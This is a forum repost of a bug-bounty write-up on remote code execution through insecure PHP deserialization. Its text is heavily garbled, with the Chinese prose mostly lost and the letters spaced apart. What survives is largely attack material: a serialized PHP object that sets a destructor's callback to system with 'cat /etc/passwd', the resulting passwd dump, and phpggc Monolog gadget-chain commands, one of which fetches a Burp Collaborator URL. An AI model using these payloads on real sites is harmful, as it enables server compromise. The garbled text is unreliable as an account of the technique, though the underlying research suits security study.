搜索

[28854] 2021-04-14_【赏金猎人】通过PHP中不安全的反序列化来远程执行代码

文档创建者:s7ckTeam
浏览次数:47
最后更新:2025-01-19
2021-04-14_【赏金猎人】通过PHP中不安全的反序列化来远程执行代码 P H P O t s   2 0 2 1 - 0 4 - 1 4 使 使 W e b P H P s e r i a l i z e u n s e r i a l i z e P H P W e b c o o k i e P H P $ m y O b j u n s e r i a l i z e W e b u n s e r i a l i z e P H P u n s e r i a l i z e             使 P H P A S L R P H P P H P P H P P H P   a d m i n 使 使 u n s e r i a l i z e 便 < ? p h p $ m y O b j   =   n e w   s t d C l a s s ( ) ; $ m y O b j - > h e l l o   =   " w o r l d " ; e c h o   s e r i a l i z e ( $ m y O b j ) ; O : 8 : " s t d C l a s s " : 1 : { s : 5 : " h e l l o " ; s : 5 : " w o r l d " ; } c l a s s   U s e r   { f u n c t i o n   _ _ c o n s t r u c t ( $ u s e r n a m e )   { i f   ( $ u s e r n a m e   = =   " a d m i n " )   { t h r o w   n e w   I n v a l i d A r g u m e n t E x c e p t i o n ( $ u s e r n a m e ) ;                 } $ t h i s - > u s e r n a m e   =   $ u s e r n a m e ;         } } $ u   =   u n s e r i a l i z e ( ' O : 4 : " U s e r " : 1 : { s : 8 : " u s e r n a m e " ; s : 5 : " a d m i n " ; } ' ) ; v a r _ d u m p ( $ u ) ; o b j e c t ( U s e r ) # 1   ( 1 )   {     [ " u s e r n a m e " ] = > s t r i n g ( 5 )   " a d m i n " } c l a s s   U s e r   { f u n c t i o n   _ _ c o n s t r u c t ( $ u s e r n a m e )   { $ t h i s - > l o g g i n g F u n c   =   ' v a r _ d u m p ' ; i f   ( $ u s e r n a m e   = =   " a d m i n " )   { t h r o w   n e w   I n v a l i d A r g u m e n t E x c e p t i o n ( $ u s e r n a m e ) ;                 } $ t h i s - > u s e r n a m e   =   $ u s e r n a m e ;         }
$ l o g g i n g F u n c s y s t e m $ u s e r n a m e c a t   / e t c / p a s s w d ; s y s t e m ( " c a t   / e t c / p a s s w d ;   i s   g o n e " ) ; 使 使 L a r a v e l S y m f o n y Z e n d   F r a m e w o r k 使 M o n o l o g 访 D o c t r i n e Z e n d f i l e s p h p g g c M o n o l o g   /   R C E 2 M o n o l o g   /   R C E 2 S y s l o g U d p H a n d l e r $ s o c k e t B u f f e r H a n d l e r $ h a n d l e r B u f f e r H a n d l e r B u f f e r H a n d l e r - > h a n d l e ( ) 使 h a n d l e S y s l o g U d p H a n d l e r c a l l $ s o c k e t - > c l o s e ( ) $ h a n d l e r - > h a n d l e ( ) h a n d l e s o c k e t S y s l o g U d p H a n d l e r U D P P H P S y s l o g U d p H a n d l e r - > s o c k e t p u b l i c P R O D U C T H I S T O R Y c o o k i e c o o k i e C o o k i e W e b u n s e r i a l i z e c o o k i e 使 p h p g g c M o n o l o g   /   R C E 1 M o n o l o g   /   R C E 2 5 0 0 使 M o n o l o g 使 p h p g g c B u r p A S C I I 使 f u n c t i o n   _ _ d e s t r u c t ( )   {                 $ f u n c   =   $ t h i s - > l o g g i n g F u n c ;                 $ f u n c ( " $ t h i s - > u s e r n a m e   i s   g o n e " ) ;                 } } u n s e r i a l i z e ( ' O : 4 : " U s e r " : 2 : { s : 1 1 : " l o g g i n g F u n c " ; s : 6 : " s y s t e m " ; s : 8 : " u s e r n a m e " ; s : 1 6 : " c a t   / e t c / p a s s w d ; " ; } ' ) r o o t : * : 0 : 0 : S y s t e m   A d m i n i s t r a t o r : / v a r / r o o t : / b i n / s h d a e m o n : * : 1 : 1 : S y s t e m   S e r v i c e s : / v a r / r o o t : / u s r / b i n / f a l s e _ u u c p : * : 4 : 4 : U n i x   t o   U n i x   C o p y   P r o t o c o l : / v a r / s p o o l / u u c p : / u s r / s b i n / u u c i c o _ t a s k g a t e d : * : 1 3 : 1 3 : T a s k   G a t e   D a e m o n : / v a r / e m p t y : / u s r / b i n / f a l s e _ n e t w o r k d : * : 2 4 : 2 4 : N e t w o r k   S e r v i c e s : / v a r / n e t w o r k d : / u s r / b i n / f a l s e . . . a : 1 : { i : 0 ; a : 6 : { s : 5 : " i m a g e " ; s : 9 4 : " h t t p s : / / w w w . e b o o k . c l i e n t . c o m / c o n t e n t s / f u l l c o n t e n t / 7 5 1 0 3 7 9 4 / c o v e r a r t s / w i z a r d / s m a l l _ 7 5 1 0 3 7 9 4 . j p g " ; s : 4 : " n a m e " ; s : 2 7 : " d e c o r a t i n g   w i t h   i n t e r i o r " ; s : 3 : " u r l " ; s : 2 2 : " d e c o r a t i n g - i n t e r i o r " ; s : 5 : " t i t l e " ; O : 8 : " D a t e T i m e " : 3 : { s : 4 : " d a t e " ; s : 2 6 : " 2 0 2 0 - 0 6 - 3 0   1 3 : 2 1 : 0 9 . 8 7 1 2 1 3 " ; s : 1 3 : " t i m e z o n e _ t y p e " ; i : 3 ; s : 8 : " t i m e z o n e " ; s : 3 : " U T C " ; } ; s : 8 : " s u b t i t l e " ; s : 0 : " " ; s : 9 : " p r o d u c t i d " ; s : 2 : " 1 7 " ; } }
M o n o l o g 使 u r l e n c o d e s u r l e n c o d e p h p g g c 使 使 d i e ( " h e l l o " ) d i e B u r p U R L P R O D U C T H I S T O R Y c o o k i e C o l l a b o r a t o r U R L 使 访 R C E A S C I I 使 线 使 P H P   U n s e r i a l i z e h t t p s : / / n o t s o s e c u r e . c o m / r e m o t e - c o d e - e x e c u t i o n - v i a - p h p - u n s e r i a l i z e / - h t t p s : / / b l o g . r e d t e a m - p e n t e s t i n g . d e / 2 0 2 1 / d e s e r i a l i z a t i o n - g a d g e t - c h a i n / $   p h p g g c   M o n o l o g / R C E 1   a   b   |   u r l e n c o d e   |   p b c o p y E N C O D I N G     - s ,   - - s o f t       S o f t   U R L e n c o d e     - u ,   - - u r l         U R L e n c o d e s   t h e   p a y l o a d     - b ,   - - b a s e 6 4   C o n v e r t s   t h e   o u t p u t   i n t o   b a s e 6 4     - j ,   - - j s o n       C o n v e r t s   t h e   o u t p u t   i n t o   j s o n     E n c o d e r s   c a n   b e   c h a i n e d ,   f o r   i n s t a n c e   - b   - u   - u   b a s e 6 4 s   t h e   p a y l o a d ,     t h e n   U R L e n c o d e s   i t   t w i c e $   p h p g g c   M o n o l o g / R C E 1   f i l e _ g e t _ c o n t e n t s   " h t t p : / / j n a 5 h w 1 z y p d o m b b 2 g y s m 5 0 s d s 4 y v m k . b u r p c o l l a b o r a t o r . n e t / r c e "   |   u r l e n c o d e |   p b c o p y

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理